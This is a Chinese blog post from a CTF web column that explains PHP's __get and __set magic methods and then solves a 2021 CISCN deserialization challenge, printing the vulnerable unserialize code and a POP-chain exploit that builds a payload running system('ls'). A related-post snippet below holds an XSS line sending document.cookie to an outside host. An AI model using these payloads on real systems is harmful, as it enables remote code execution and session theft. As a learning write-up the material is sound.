加深PHP魔术方法之__get,__set的理解

最新推荐文章于 2022-02-13 20:14:39 发布
最新推荐文章于 2022-02-13 20:14:39 发布
阅读量107 收藏
点赞数
分类专栏: ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/119140953
版权
ctf 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
web
26 篇文章 0 订阅
订阅专栏
  • 从一个难以访问的属性读取数据的时候 __get() 方法被调用
  • 向一个难以访问的属性赋值的时候 __set() 方法被调用
  • 难以访问包括:(1)私有属性,(2)没有初始化的属性

两个用实例,简洁的描述了这两个魔术方法的链接
https://www.php.cn/php-weizijiaocheng-450007.html
https://www.cnblogs.com/jiqing9006/p/5411403.html
题目

<?php
highlight_file(__FILE__);
class Fake{
    public $firm;
    public $test;
    public function __set($firm,$test){
    $test = "No,You can't";
    $firm = unserialize($firm);
    call_user_func($firm,$test);
  }
}
class Temp{
    public $pri;
    public $fin=1;
    public function __destruct()
    {
        $a=$this->action;
       $this->pri->$a = $this->fin;
    }

}

class OwO{
    public $fc;
    public $args;   
    function run()
    {

        return ($this->fc)($this->args);

    }
}
$d = $_GET['poc'];
unserialize($d);
?>

思路啥都比较简单,就不写了

<?php
class Fake{
    public $firm;
    public $test;
}
class Temp{
    public $pri;
    public $fin=1;
}
class OwO{
    public $fc="system";
    public $args="ls";   
}


$b=new Fake();

$a=new Temp();
$a->pri=$b;
$a->action=serialize(array(new OwO,"run"));


echo serialize($a);
jvkyvly
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP魔术方法__GET、__SET使用实例
10-25
主要介绍了PHP魔术方法__GET、__SET使用实例,本文在代码中做了详细的注释,需要的朋友可以参考下
魔术方法__get()、__set()和__call()的用法
cqn2bd2b的博客
10-31 247
_get()、__set() 和__call()是很常用的,虽然不像__construct、__destruct运用的那么多,但是它们地位也是毋庸置疑的,__construct、__destruct大家肯定非常熟悉了,在这就不多说了,直接看—————__get()、__set() 和__call();刚开始学习魔术方法时对__get()、__set() 和__call()的用法和作用不是太了解,也有一些误解。__get()是访问不存在的成员变量时调用的;__set()是设置不存在的成员变量时调用的;
PHP中__get()和__set的用法
jar_java的专栏
06-04 5725
php面向对象_get(),_set()的用法   一般来说,总是把类的属性定义为private,这更符合现实的逻辑。但是,对属性的读取和赋值操作是非常频繁的,因此在PHP5中,预定义了两个函数“__get()”和“__set()”来获取和赋值其属性。类似于java中的javabean的操作,使用的方法也类似,只是不需要像javabean中那样,对每个字段进行set和get的操作。只需要加上两
php类的__set()、__get()、__isset()、__unset()、__call()、__callStatic()、__invoke()
June.1
03-26 1万+
1.__set()、__get() 应用 通过类中定义__set()、__get()魔术方法可以避免多个成员变量重复去定义get、set方法。 使用原理当外部设置 $UserAppIndex->username=‘华山论剑’; 时调用 __set() 。 当 $UserAppIndex->username; 时调用__get()方法 注:这些魔术方法的参数都不能通过引用传递。重...
PHP中的__get和__set理解
weixin_34195364的博客
07-29 121
先来了解一下PHP类中的__get和__set函数 当我们试图获取一个不可达属性时(比如private),类会自动调用__get函数。当试图设置一个不可达属性时(比如private),类会自动调用__set函数,我们一起来看个例子: &lt;?php class Person{ public $name = '周伯通'; private $sex = '男'; } $class ...
PHP 5.3新增魔术方法__invoke概述
10-25
主要介绍了PHP 5.3新增魔术方法__invoke,需要的朋友可以参考下
PHP魔术方法__ISSET、__UNSET使用实例
01-20
__isset() – 在对类中属性或者非类中属性使用isset()方法的时候如果... * 针对类中的魔术方法 __isset() 和 __unset() 的例子  */ class Example {  public $public;  protected $protected;  private $private
详解php魔术方法__get()和__set()使用介绍
01-21
__get() is utilized for reading data from inaccessible properties. 究竟用中文怎么翻译呢? inaccessible :n. 难达到;难接近;无法理解。 有代码有真相: 复制代码 代码如下: <?php error_reporting(E_ALL...
Python的descriptor
pythonic.me
12-02 436
如果你和我一样,曾经对method和function以及对它们的各种访问方式包括self参数的隐含传递迷惑不解,建议你耐心的看下去。这里还提到了Python属性查找策略,使你清楚的知道Python处理obj.attr和obj.attr=val时,到底做了哪些工作。 Python中,对象的方法也是也可以认为是属性,所以下面所说的属性包含方法在内。 先定义下面这个类,还定义了它的一个实例,留着后面用...
PHP魔术方法__get和__set的用法
饱和泛滥的程序员-残骸
11-25 1027
PHP中,魔术方法有很多种,本文章给大家记录分享:__get\__set的用法跟理解 首先,我们得明白oop中的三个访问修饰符:public、protected、private 分别的意思: 1、公共的,任何地方都可以访问,包括本类,子类,外部 2、受保护的成员属性或者方法,只能在本类或者子类中访问 3、私有的,只能在本类中访问 那么__get,__set就跟这修饰符存在跟很大的关系 ...
python的__get__方法看这一篇就足够了
weixin_30314631的博客
05-25 429
get类型函数 直接上代码: class TestMain: def __init__(self): print('TestMain:__init__') self.a = 1 if __name__ == '__main__': t = TestMain() print(t.a) 在没有任何get函数的...
ciscn2021 反序列化
weixin_45805993的博客
07-05 174
正好还留着当时的源码,先发一波 <?phpclass Fake{ public $firm; public $test; public function __set($firm,$test){ $test = "No,You can't"; $firm = unserialize($firm); call_user_func($firm,$test); }}class Temp{ public $pri; public $fin=1; public function __destruct() {
php面向对象_get(),_set()的用法
php菜鸟见闻录
11-15 2208
将大佬的东西画蛇添足了一下,看起来方便一些,原文https://www.cnblogs.com/zzc134680/p/5570519.html 简单来说 __set()方法用来设置私有属性 __get()方法用来获取私有属性 __get()方法:这个方法用来获取私有成员属性值的,有一个参数,参数传入你要获取的成员属性的名称,返回获取的属性值,这个方法不用我们手工的去调用,因为我们也可以把这个方法...
get()和set()的基本用法
热门推荐
迷路的小绅士之家
03-31 5万+
使用前提:当要访问被private封装的属性时 之所以用private封装,又对外提供访问方式(set get),是因为可以在访问方式中加入逻辑判断等语句,对访问的数据进行操作,提高代码的健壮性。 class Student{ private int age; public int getAge(){//获取private权限下的age//4. retur...
ciscn2021华南赛区复赛两道web
Airwooh的博客
07-16 267
s:13:“Test::getHint”; 找到demo.php审计代码。 构造链子。 <?php class Fake{ public $firm; public $test; public function __set($firm,$test){ $test = "No,You can't"; $firm = unserialize($firm); //echo $firm; call_user_func($firm,$test); } } class Temp{ public
__set和__get方法
lightWay的博客
01-27 850
__set和__get是两个比较重要的魔术方法,如下面代码所示。 <?php class Account { private $user = 1; private $pwd = 2; } $a = new Account(); echo $a->user; $a->name = 5; echo $a->name; echo $a->big; 运行这段代码会怎么样呢?结果报错如
VNCTF2022 web wp
Je3Z的博客
02-13 1万+
GameV4.0 js/data.js下有段FLAG的base64加密 Vk5DVEYlN0JXZWxjb21lX3RvX1ZOQ1RGMjAyMiU3RA== 解码就行 VNCTF{Welcome_to_VNCTF2022} gocalc0 是个xss,没有过滤,前几次一直不行,session解密木得flag,不知道最后怎么又可以了,www <script>window.open('http://ip:7777/'+document.cookie)</script> 然后把ses
一道ssrf
Je3Z的博客
11-15 3245
前言 : 我最开始写文章的初衷是为了写给自己看的,然后记录自己的学习,也给自己留个回忆吧(感觉这个挺有意思的),然后现在可能慢慢会在意下读者的感受,嘻嘻。。。 然后这个题也不难,就是ssrf没学好,然后记录一下,感觉还有点小意思吧。。。 那个环境没了,eee就没有截图啦。。。 开始是一个平台,然后我们是guest用户,然后提示我们要成admin嘛(下面那个是后面的截图,之前的没了) 然后是弱密钥,爆破,密钥为12345,然后改成admin用户,然后跳转到/index.php?comment=http://
php魔术方法__unseri
最新发布
05-12
`__unseri`alize 是 PHP 中的一个魔术方法,用于反序列化操作。当使用 `serialize` 函数将一个对象序列化为字符串时,可以使用 `__unserialize` 方法在需要时重新构建对象。这个方法会在 PHP 尝试从字符串创建一个...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值